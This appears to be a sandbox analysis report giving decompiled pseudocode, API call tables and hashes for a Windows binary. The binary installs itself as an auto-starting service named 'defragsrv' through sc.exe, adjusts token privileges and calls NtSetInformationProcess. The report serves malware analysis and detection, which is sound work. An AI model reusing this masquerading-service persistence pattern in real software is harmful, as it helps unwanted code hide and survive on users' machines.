                                                                    							E00E590E0( &_v620,  *((intOrPtr*)(_t394 + 0xc)));
                                                                    							_v8 = 1;
                                                                    							_t543 = E00EACDB8(_t583);
                                                                    							_t555 =  >=  ? _v620 :  &_v620;
                                                                    							 *_t543 = 0;
                                                                    							_t383 = E00EACD15( &_v620, _t555,  &_v572, 0xa);
                                                                    							_t561 = _t561 + 0xc;
                                                                    							_v624 = _t383;
                                                                    							if(_t555 == _v572) {
                                                                    								_push("invalid stoi argument");
                                                                    								E00EA5A97();
                                                                    								goto L70;
                                                                    							} else {
                                                                    								if( *_t543 == 0x22) {
                                                                    									L70:
                                                                    									_push("stoi argument out of range");
                                                                    									E00EA5AD7();
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									 *0xeef9d0 = 0;
                                                                    									 *0xf2bfac = 0x10;
                                                                    									 *0xf2bfb0 = 2;
                                                                    									 *0xf2bfb4 = 4;
                                                                    									 *0xf2bfb8 = 0;
                                                                    									 *0xf2bfbc = 0;
                                                                    									 *0xf2bfc0 = 0;
                                                                    									 *0xf2bfc4 = 0;
                                                                    									_t386 = RegisterServiceCtrlHandlerW(L"defragsrv", E00E58F90);
                                                                    									 *0xf2bfa8 = _t386;
                                                                    									__eflags = _t386;
                                                                    									if(_t386 != 0) {
                                                                    										 *0xf2bfb0 = 4; // executed
                                                                    										SetServiceStatus(_t386, 0xf2bfac); // executed
                                                                    										_t388 = 0;
                                                                    										__eflags = 0;
                                                                    										while(1) {
                                                                    											__eflags = _t388;
                                                                    											if(_t388 == 0) {
                                                                    												goto L74;
                                                                    											}
                                                                    											__eflags = _t388 - 0xffffffff;
                                                                    											if(_t388 == 0xffffffff) {
                                                                    												goto L74;
                                                                    											}
                                                                    											WaitForSingleObject(_t388, 0xffffffff);
                                                                    											 *0xf2bfb4 = 0;
                                                                    											 *0xf2bfb0 = 1;
                                                                    											 *0xf2bfb8 = 0;
                                                                    											 *0xf2bfc0 = 3;
                                                                    											_t386 = SetServiceStatus( *0xf2bfa8, 0xf2bfac);
                                                                    											__eflags = _t386;
                                                                    											if(_t386 == 0) {
                                                                    												OutputDebugStringW(L"My Sample Service: ServiceMain: SetServiceStatus returned error");
                                                                    												return _t386;
                                                                    											}
                                                                    											goto L77;
                                                                    											L74:
                                                                    											_t388 = CreateThread(0, 0, 0xe59d20, 0, 0, 0); // executed
                                                                    										}
                                                                    									}
                                                                    									L77:
                                                                    									return _t386;
                                                                    								} else {
                                                                    									_v8 = 0;
                                                                    									E00E59AF0(_t394,  &_v620, _t543);
                                                                    									_t556 = 0xa;
                                                                    									_t541 = (0x66666667 * _v624 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _v624 >> 0x20 >> 2);
                                                                    									do {
                                                                    										Sleep(_t541);
                                                                    										_t556 = _t556 - 1;
                                                                    									} while (_t556 != 0);
                                                                    									goto L9;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L78:
                                                                    			}





























































































                                                                    0x00e583b0
                                                                    0x00e583b1
                                                                    0x00e583b3
                                                                    0x00e583b5
                                                                    0x00e583c0
                                                                    0x00e583c1
                                                                    0x00e583c7
                                                                    0x00e583cc
                                                                    0x00e583ce
                                                                    0x00e583d1
                                                                    0x00e583d2
                                                                    0x00e583d3
                                                                    0x00e583d4
                                                                    0x00e583d8
                                                                    0x00e583de
                                                                    0x00e583e1
                                                                    0x00e583e7
                                                                    0x00e58c12
                                                                    0x00e58c1d
                                                                    0x00e58c27
                                                                    0x00e58c31
                                                                    0x00e58c3b
                                                                    0x00e58c41
                                                                    0x00e58c43
                                                                    0x00e58c57
                                                                    0x00e58c61
                                                                    0x00e58c6b
                                                                    0x00e58c80
                                                                    0x00e58c8a
                                                                    0x00e58c94
                                                                    0x00e58c9b
                                                                    0x00e58ca0
                                                                    0x00e58cb8
                                                                    0x00e58cbd
                                                                    0x00e58cce
                                                                    0x00e58cd3
                                                                    0x00e58ce6
                                                                    0x00e58ceb
                                                                    0x00e58d04
                                                                    0x00e58d06
                                                                    0x00e58d0a
                                                                    0x00e58d0e
                                                                    0x00e58d10
                                                                    0x00e58d10
                                                                    0x00e58d12
                                                                    0x00e58d14
                                                                    0x00e58d1e
                                                                    0x00e58d24
                                                                    0x00e58d2e
                                                                    0x00e58d38
                                                                    0x00e58d3b
                                                                    0x00e58d45
                                                                    0x00e58d50
                                                                    0x00e58d50
                                                                    0x00e58d53
                                                                    0x00e58d56
                                                                    0x00e58d56
                                                                    0x00e58d6d
                                                                    0x00e58d72
                                                                    0x00e58d7c
                                                                    0x00e58d87
                                                                    0x00e58d8c
                                                                    0x00e58d9d
                                                                    0x00e58da5
                                                                    0x00e58da9
                                                                    0x00e58dad
                                                                    0x00e58daf
                                                                    0x00e58daf
                                                                    0x00e58db1
                                                                    0x00e58db3
                                                                    0x00e58db5
                                                                    0x00e58db9
                                                                    0x00e58dc1
                                                                    0x00e58dcb
                                                                    0x00e58dd0
                                                                    0x00e58dda
                                                                    0x00e58ddf
                                                                    0x00e58de9
                                                                    0x00e58dee
                                                                    0x00e58df8
                                                                    0x00e58dfd
                                                                    0x00e58e07
                                                                    0x00e58e0c
                                                                    0x00e58e16
                                                                    0x00e58e1b
                                                                    0x00e58e1f
                                                                    0x00000000
                                                                    0x00e58e1f
                                                                    0x00000000
                                                                    0x00e583ed
                                                                    0x00e583f0
                                                                    0x00e5852e
                                                                    0x00e5852e
                                                                    0x00e58531
                                                                    0x00e58536
                                                                    0x00e58538
                                                                    0x00e58538
                                                                    0x00e5853e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e58543
                                                                    0x00e5855a
                                                                    0x00e5855a
                                                                    0x00e58545
                                                                    0x00e58545
                                                                    0x00e58549
                                                                    0x00e5854d
                                                                    0x00000000
                                                                    0x00e5854f
                                                                    0x00e5854f
                                                                    0x00e58552
                                                                    0x00e58558
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e58558
                                                                    0x00e5854d
                                                                    0x00e58563
                                                                    0x00e58563
                                                                    0x00e58565
                                                                    0x00e58572
                                                                    0x00e58577
                                                                    0x00e58580
                                                                    0x00e58580
                                                                    0x00e58583
                                                                    0x00e58586
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e58588
                                                                    0x00e5858b
                                                                    0x00e585a2
                                                                    0x00e585a2
                                                                    0x00e5858d
                                                                    0x00e5858d
                                                                    0x00e58591
                                                                    0x00e58595
                                                                    0x00000000
                                                                    0x00e58597
                                                                    0x00e58597
                                                                    0x00e5859a
                                                                    0x00e5859d
                                                                    0x00e585a0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e585a0
                                                                    0x00e58595
                                                                    0x00e585ab
                                                                    0x00e585ab
                                                                    0x00e585ad
                                                                    0x00e5891b
                                                                    0x00e58920
                                                                    0x00e58920
                                                                    0x00e58923
                                                                    0x00e58926
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e58928
                                                                    0x00e5892b
                                                                    0x00e58942
                                                                    0x00e58942
                                                                    0x00e5892d
                                                                    0x00e5892d
                                                                    0x00e58931
                                                                    0x00e58935
                                                                    0x00000000
                                                                    0x00e58937
                                                                    0x00e58937
                                                                    0x00e5893a
                                                                    0x00e5893d
                                                                    0x00e58940
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e58940
                                                                    0x00e58935
                                                                    0x00e5894b
                                                                    0x00e5894b
                                                                    0x00e58950
                                                                    0x00e58958
                                                                    0x00e58959
                                                                    0x00e5895b
                                                                    0x00e58ac2
                                                                    0x00e58ad3
                                                                    0x00e58ad8
                                                                    0x00e58aec
                                                                    0x00e58af1
                                                                    0x00e58b02
                                                                    0x00e58b07
                                                                    0x00e58b1a
                                                                    0x00e58b1f
                                                                    0x00e58b38
                                                                    0x00e58b3a
                                                                    0x00e58b3e
                                                                    0x00e58b42
                                                                    0x00e58b44
                                                                    0x00e58b44
                                                                    0x00e58b53
                                                                    0x00e58b58
                                                                    0x00e58b62
                                                                    0x00e58b69
                                                                    0x00e58b6e
                                                                    0x00e58b7f
                                                                    0x00e58b87
                                                                    0x00e58b8b
                                                                    0x00e58b8f
                                                                    0x00e58b91
                                                                    0x00e58b91
                                                                    0x00e58b93
                                                                    0x00e58b95
                                                                    0x00e58b97
                                                                    0x00e58b9b
                                                                    0x00e58ba3
                                                                    0x00e58bad
                                                                    0x00e58bb2
                                                                    0x00e58bbc
                                                                    0x00e58bc1
                                                                    0x00e58bcb
                                                                    0x00e58bd0
                                                                    0x00e58bda
                                                                    0x00e58bdf
                                                                    0x00e58be9
                                                                    0x00e58bee
                                                                    0x00e58bf8
                                                                    0x00e58bfd
                                                                    0x00e58c01
                                                                    0x00e58e25
                                                                    0x00e58e25
                                                                    0x00e58e2a
                                                                    0x00e58e31
                                                                    0x00e58e37
                                                                    0x00e58e3c
                                                                    0x00e58e41
                                                                    0x00e58e4e
                                                                    0x00000000
                                                                    0x00e58961
                                                                    0x00e58961
                                                                    0x00e58972
                                                                    0x00e58977
                                                                    0x00e5898b
                                                                    0x00e58990
                                                                    0x00e589a1
                                                                    0x00e589a6
                                                                    0x00e589b9
                                                                    0x00e589be
                                                                    0x00e589d7
                                                                    0x00e589d9
                                                                    0x00e589dd
                                                                    0x00e589e1
                                                                    0x00e589e3
                                                                    0x00e589e3
                                                                    0x00e589f2
                                                                    0x00e589f7
                                                                    0x00e58a01
                                                                    0x00e58a08
                                                                    0x00e58a0d
                                                                    0x00e58a1e
                                                                    0x00e58a26
                                                                    0x00e58a2a
                                                                    0x00e58a2e
                                                                    0x00e58a30
                                                                    0x00e58a30
                                                                    0x00e58a32
                                                                    0x00e58a34
                                                                    0x00e58a3a
                                                                    0x00e58a42
                                                                    0x00e58a4c
                                                                    0x00e58a51
                                                                    0x00e58a5b
                                                                    0x00e58a60
                                                                    0x00e58a6a
                                                                    0x00e58a6f
                                                                    0x00e58a79
                                                                    0x00e58a7e
                                                                    0x00e58a88
                                                                    0x00e58a8d
                                                                    0x00e58a97
                                                                    0x00e58a9c
                                                                    0x00e58aa6
                                                                    0x00e58aab
                                                                    0x00e58ab8
                                                                    0x00e58ab8
                                                                    0x00000000
                                                                    0x00e5895b
                                                                    0x00e58946
                                                                    0x00e58948
                                                                    0x00e58948
                                                                    0x00000000
                                                                    0x00e585b3
                                                                    0x00e585c0
                                                                    0x00e585ca
                                                                    0x00e585d4
                                                                    0x00e585e9
                                                                    0x00e585f3
                                                                    0x00e585fd
                                                                    0x00e58604
                                                                    0x00e58609
                                                                    0x00e58621
                                                                    0x00e58626
                                                                    0x00e58637
                                                                    0x00e5863c
                                                                    0x00e5864f
                                                                    0x00e58654
                                                                    0x00e5866d
                                                                    0x00e5866f
                                                                    0x00e58673
                                                                    0x00e58677
                                                                    0x00e58679
                                                                    0x00e58679
                                                                    0x00e5867b
                                                                    0x00e5867d
                                                                    0x00e58687
                                                                    0x00e5868d
                                                                    0x00e58697
                                                                    0x00e586a1
                                                                    0x00e586a4
                                                                    0x00e586ae
                                                                    0x00e586b5
                                                                    0x00e586b5
                                                                    0x00e586b8
                                                                    0x00e586bb
                                                                    0x00e586bb
                                                                    0x00e586d2
                                                                    0x00e586d7
                                                                    0x00e586e1
                                                                    0x00e586ec
                                                                    0x00e586f1
                                                                    0x00e58702
                                                                    0x00e5870a
                                                                    0x00e5870e
                                                                    0x00e58712
                                                                    0x00e58714
                                                                    0x00e58714
                                                                    0x00e58716
                                                                    0x00e58718
                                                                    0x00e5871e
                                                                    0x00e58726
                                                                    0x00e58730
                                                                    0x00e58735
                                                                    0x00e5873f
                                                                    0x00e58744
                                                                    0x00e5874e
                                                                    0x00e58753
                                                                    0x00e5875d
                                                                    0x00e58762
                                                                    0x00e5876c
                                                                    0x00e58771
                                                                    0x00e5877b
                                                                    0x00e58780
                                                                    0x00e5878a
                                                                    0x00e5878f
                                                                    0x00e5879c
                                                                    0x00e587a6
                                                                    0x00e587b0
                                                                    0x00e587ba
                                                                    0x00e587cf
                                                                    0x00e587d9
                                                                    0x00e587e3
                                                                    0x00e587ea
                                                                    0x00e587ef
                                                                    0x00e5880f
                                                                    0x00e58811
                                                                    0x00e58815
                                                                    0x00e58819
                                                                    0x00e5881b
                                                                    0x00e5881b
                                                                    0x00e5881d
                                                                    0x00e5881f
                                                                    0x00e58829
                                                                    0x00e5882f
                                                                    0x00e58839
                                                                    0x00e58843
                                                                    0x00e58846
                                                                    0x00e58850
                                                                    0x00e58857
                                                                    0x00e58857
                                                                    0x00e5885a
                                                                    0x00e5885d
                                                                    0x00e5885d
                                                                    0x00e58874
                                                                    0x00e58879
                                                                    0x00e58883
                                                                    0x00e5888e
                                                                    0x00e58893
                                                                    0x00e588a4
                                                                    0x00e588ac
                                                                    0x00e588b0
                                                                    0x00e588b4
                                                                    0x00e588b6
                                                                    0x00e588b6
                                                                    0x00e588b8
                                                                    0x00e588ba
                                                                    0x00e588c0
                                                                    0x00e588c8
                                                                    0x00e588d2
                                                                    0x00e588d7
                                                                    0x00e588e1
                                                                    0x00e588e6
                                                                    0x00e588f0
                                                                    0x00e588f5
                                                                    0x00e588ff
                                                                    0x00e58904
                                                                    0x00e58911
                                                                    0x00e58911
                                                                    0x00000000
                                                                    0x00e585ad
                                                                    0x00e585a6
                                                                    0x00e585a8
                                                                    0x00e585a8
                                                                    0x00000000
                                                                    0x00e58567
                                                                    0x00e58567
                                                                    0x00e58e54
                                                                    0x00e58e54
                                                                    0x00e58e54
                                                                    0x00e58e59
                                                                    0x00e58e5e
                                                                    0x00e58e76
                                                                    0x00000000
                                                                    0x00e58e76
                                                                    0x00e5855e
                                                                    0x00e58560
                                                                    0x00e58560
                                                                    0x00000000
                                                                    0x00e583f6
                                                                    0x00e583f6
                                                                    0x00e583fb
                                                                    0x00e583fd
                                                                    0x00e58407
                                                                    0x00e58411
                                                                    0x00e5841b
                                                                    0x00e58425
                                                                    0x00e5842c
                                                                    0x00e58430
                                                                    0x00e58430
                                                                    0x00e58433
                                                                    0x00e58436
                                                                    0x00e58447
                                                                    0x00e5844c
                                                                    0x00e58466
                                                                    0x00e58475
                                                                    0x00e5847a
                                                                    0x00e5847d
                                                                    0x00e58480
                                                                    0x00e5851c
                                                                    0x00e5851c
                                                                    0x00e58529
                                                                    0x00000000
                                                                    0x00e58486
                                                                    0x00e5848f
                                                                    0x00e58494
                                                                    0x00e584aa
                                                                    0x00e584b2
                                                                    0x00e584bd
                                                                    0x00e584c3
                                                                    0x00e584c8
                                                                    0x00e584cb
                                                                    0x00e584d7
                                                                    0x00e58e77
                                                                    0x00e58e7c
                                                                    0x00000000
                                                                    0x00e584dd
                                                                    0x00e584e0
                                                                    0x00e58e81
                                                                    0x00e58e81
                                                                    0x00e58e86
                                                                    0x00e58e8b
                                                                    0x00e58e8c
                                                                    0x00e58e8d
                                                                    0x00e58e8e
                                                                    0x00e58e8f
                                                                    0x00e58e9a
                                                                    0x00e58ea1
                                                                    0x00e58eab
                                                                    0x00e58eb5
                                                                    0x00e58ebf
                                                                    0x00e58ec9
                                                                    0x00e58ed3
                                                                    0x00e58edd
                                                                    0x00e58ee7
                                                                    0x00e58eed
                                                                    0x00e58ef2
                                                                    0x00e58ef4
                                                                    0x00e58f00
                                                                    0x00e58f0a
                                                                    0x00e58f10
                                                                    0x00e58f10
                                                                    0x00e58f12
                                                                    0x00e58f12
                                                                    0x00e58f14
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e58f16
                                                                    0x00e58f19
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e58f35
                                                                    0x00e58f46
                                                                    0x00e58f50
                                                                    0x00e58f5a
                                                                    0x00e58f64
                                                                    0x00e58f6e
                                                                    0x00e58f74
                                                                    0x00e58f76
                                                                    0x00e58f7d
                                                                    0x00000000
                                                                    0x00e58f7d
                                                                    0x00000000
                                                                    0x00e58f1b
                                                                    0x00e58f2a
                                                                    0x00e58f2a
                                                                    0x00e58f12
                                                                    0x00e58f83
                                                                    0x00e58f83
                                                                    0x00e584e6
                                                                    0x00e584e6
                                                                    0x00e584f0
                                                                    0x00e584fa
                                                                    0x00e5850d
                                                                    0x00e58510
                                                                    0x00e58511
                                                                    0x00e58517
                                                                    0x00e58517
                                                                    0x00000000
                                                                    0x00e58510
                                                                    0x00e584e0
                                                                    0x00e584d7
                                                                    0x00e58480
                                                                    0x00e583f0
                                                                    0x00000000

                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,?,?,?), ref: 00E58511
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105,2B749D79), ref: 00E585C0
                                                                    • Sleep.KERNEL32(00000BB8,?,?,?,00000007), ref: 00E587A6
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,2B749D79), ref: 00E58961
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,2B749D79), ref: 00E58AC2
                                                                    • StartServiceCtrlDispatcherW.ADVAPI32(?,2B749D79), ref: 00E58C3B
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 00E58C57
                                                                    • Sleep.KERNEL32(00001388,?,?,?,?,00000007), ref: 00E58E4E
                                                                    • RegisterServiceCtrlHandlerW.ADVAPI32(defragsrv,00E58F90,stoi argument out of range,invalid stoi argument,?,?,?), ref: 00E58EE7
                                                                    • SetServiceStatus.SECHOST(00000000,00F2BFAC,?,?,?), ref: 00E58F0A
                                                                    • CreateThread.KERNELBASE(00000000,00000000,00E59D20,00000000,00000000,00000000), ref: 00E58F2A
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?), ref: 00E58F35
                                                                    • SetServiceStatus.ADVAPI32(00F2BFAC,?,?,?), ref: 00E58F6E
                                                                    • OutputDebugStringW.KERNEL32(My Sample Service: ServiceMain: SetServiceStatus returned error,?,?,?), ref: 00E58F7D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileModuleNameService$Sleep$CtrlStatus$CreateDebugDispatcherHandlerObjectOutputRegisterSingleStartStringThreadWait
                                                                    • String ID: $ binpath= "$" start= auto$-irs$-is$-wait$My Sample Service: ServiceMain: SetServiceStatus returned error$\windows\system32\sc.exe$create $defragsrv$gfff$invalid stoi argument$running after 5 seconds, close proccess for cancelling$start $stoi argument out of range
                                                                    • API String ID: 4161608198-2431798377
                                                                    • Opcode ID: 397dfc633e4b787fd7dbaefd88e6308c3336813f6d96b4661c5e2b77e2d85d3d
                                                                    • Instruction ID: ac5681de58b7a1fca27fcff78c24152693a63aaed0df38fabd4b4c1faef2aae5
                                                                    • Opcode Fuzzy Hash: 397dfc633e4b787fd7dbaefd88e6308c3336813f6d96b4661c5e2b77e2d85d3d
                                                                    • Instruction Fuzzy Hash: 84629C30901258DADB24EB64CE9ABDEB7B0AF10305F1055E8D80A7B292EBB55F4DCB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000020,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,\\?\), ref: 00E86E99
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,\\?\), ref: 00E86EA0
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00EDA42C,?), ref: 00E86EB1
                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 00E86EE4
                                                                    • CloseHandle.KERNEL32(?), ref: 00E86EF1
                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00E86F08
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseProcessToken$AdjustChangeCurrentFindHandleLookupNotificationOpenPrivilegePrivilegesValue
                                                                    • String ID:
                                                                    • API String ID: 1649481349-0
                                                                    • Opcode ID: 2b4a617b555652996acd78a4d5b31e32a522a31b0a2f470df29bcf4988c2d8e9
                                                                    • Instruction ID: 0ff0a7b977645697551664a3fb7527cb1076469f837813fd4512007884c65100
                                                                    • Opcode Fuzzy Hash: 2b4a617b555652996acd78a4d5b31e32a522a31b0a2f470df29bcf4988c2d8e9
                                                                    • Instruction Fuzzy Hash: 66111275A05208AFDF10DFA5DC49FEEB7B8EB08704F000179F905B6280DB769A05DB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00E735BB,?,00EAF01D,?,?,00E735BB,?,00E735BB,00000001), ref: 00EAF040
                                                                    • TerminateProcess.KERNEL32(00000000,?,00EAF01D,?,?,00E735BB,?,00E735BB,00000001), ref: 00EAF047
                                                                    • ExitProcess.KERNEL32 ref: 00EAF059
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: cedbf8a0730438b6e049fd9181f417ff8da6877b68ebc1c2455e54b9aedd5d4d
                                                                    • Instruction ID: 3a2c88c7fb36bfadd77138f7ff4e1058133b9b81730513d5cdb6b134b3476d3e
                                                                    • Opcode Fuzzy Hash: cedbf8a0730438b6e049fd9181f417ff8da6877b68ebc1c2455e54b9aedd5d4d
                                                                    • Instruction Fuzzy Hash: 68E0B631005148EFCF626B99DC49E493B69EB56746F005434F805AA132CB3BED82DA54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000001D,?,00000004,00000000,?,00E5EA5B,00000000), ref: 00E86E52
                                                                    • NtSetInformationProcess.NTDLL(?,00E5EA5B,00000000), ref: 00E86E61
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentInformation
                                                                    • String ID:
                                                                    • API String ID: 2491907881-0
                                                                    • Opcode ID: 6e020dc6dcaf6ca7f9909b164b07cf41edbfff38aeff9b3b2b1da43c69e2ad54
                                                                    • Instruction ID: 840b8b5a2e78ad1eeee977f4912cfe9129ab32eb790de1d25fb2cc416634353c
                                                                    • Opcode Fuzzy Hash: 6e020dc6dcaf6ca7f9909b164b07cf41edbfff38aeff9b3b2b1da43c69e2ad54
                                                                    • Instruction Fuzzy Hash: 68E09B71E0410CAFC700EF699C41AADB7BCDB08610F4001B6E505A7280CA7159054B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: 9c52884cf51145ba8d4760cc35d48d23ab5bd61f691a3157c0fb4c310b11fe71
                                                                    • Instruction ID: 2cc2e480cd656cc306e64af7fb301efe4a2706d0940558f6f0103814f8d0370e
                                                                    • Opcode Fuzzy Hash: 9c52884cf51145ba8d4760cc35d48d23ab5bd61f691a3157c0fb4c310b11fe71
                                                                    • Instruction Fuzzy Hash: 8021A833A05B15ABCB228B659C81FDB7B549B417A4F292521EC46B7291D631EC01CAE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,2B749D79,00000001,00000001), ref: 00E5EACF
                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00E5EAE3
                                                                    • ReadFile.KERNEL32(00000000,?,00000006,00000008,00000000), ref: 00E5EB09
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E5EB1D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 3919263394-0
                                                                    • Opcode ID: 01c50cf87d89975a47019e30268070c36a78c918f96c31a8c2d12f1cae53cb48
                                                                    • Instruction ID: 349bd8a5ac53f3be001a09b11caf431ff0e376cd5d0c11a1b4ce7666059b74ba
                                                                    • Opcode Fuzzy Hash: 01c50cf87d89975a47019e30268070c36a78c918f96c31a8c2d12f1cae53cb48
                                                                    • Instruction Fuzzy Hash: 3A213D71904208EFDB24DF55CC45FEEB7B8EB44721F104229E911B62C0D7756A49CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,2B749D79,00000001), ref: 00E5EBAF
                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00E5EBC3
                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00E5EBE9
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E5EBF6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
